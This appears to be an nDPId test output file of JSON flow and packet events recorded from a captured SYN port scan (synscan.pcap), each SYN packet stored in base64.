+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs4YkAADEGNemsEAAIQA2GNIzSA4fdUoMYAAAAAGACCAAtCAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ20AADAG8QWsEAAIQA2GNIzSAGTdUoMYAAAAAGACBAA0KwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs1gMAADkGOW+sEAAIQA2GNIzSDnfdUoMYAAAAAGACCAAiGAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsVUAAADgGuzKsEAAIQA2GNIzSBATdUoMYAAAAAGACBAAwiwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsmTIAAC0GgkCsEAAIQA2GNIzSA4TdUoMYAAAAAGACCAAtCwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1592,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsR1MAACsG1h+sEAAIQA2GNIzSA2ndUoMYAAAAAGACEAAlJgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsFScAADsG+EusEAAIQA2GNIzSAHfdUoMYAAAAAGACEAAoGAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1594,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAs+kcAACoGJCusEAAIQA2GNIzSZmbdUoMYAAAAAGACDADGKAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_packet_id":1,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060847,"pkt":"ACYLMQczACWzv5HuCABFAAAsd6gAAC0Go8qsEAAIQA2GNIzSUVzdUoMYAAAAAGACCADfMgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/sQAADgGEa6sEAAIQA2GNIzTgBDdU4MZAAAAAGACBAC0ewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs6v8AADQGKXOsEAAIQA2GNIzTCzvdU4MZAAAAAGACBAApUQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsPkcAAC8G2yusEAAIQA2GNIzTBGrdU4MZAAAAAGACEAAkIgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1599,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsk0UAACgGjS2sEAAIQA2GNIzTwPjdU4MZAAAAAGACBABzkwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsjnEAADUGhQGsEAAIQA2GNIzTI4zdU4MZAAAAAGACCAANAAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsG1AAADIG+yKsEAAIQA2GNIzTFz7dU4MZAAAAAGACDAAVTgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsYUcAADEGtiusEAAIQA2GNIzTVEPdU4MZAAAAAGACCADcSAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs2SUAACUGSk2sEAAIQA2GNIzTBB7dU4MZAAAAAGACCAAsbgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060866,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_packet_id":1,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060866,"pkt":"ACYLMQczACWzv5HuCABFAAAsyi8AACkGVUOsEAAIQA2GNIzTA\/7dU4MZAAAAAGACCAAsjgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060866,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_packet_id":1,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060866,"pkt":"ACYLMQczACWzv5HuCABFAAAsoM4AACgGf6SsEAAIQA2GNIzTBhTdU4MZAAAAAGACBAAueAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsho4AACUGnOSsEAAIQA2GNIzTB4\/dU4MZAAAAAGACCAAo\/QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs9nsAACkGKPesEAAIQA2GNIzTBArdU4MZAAAAAGACCAAsggAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAseCYAADUGm0ysEAAIQA2GNIzTB\/vdU4MZAAAAAGACCAAokQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsC2kAACgGFQqsEAAIQA2GNIzTIGLdU4MZAAAAAGACBAAUKgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsiWIAADkGhhCsEAAIQA2GNIzTCRPdU4MZAAAAAGACCAAneQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 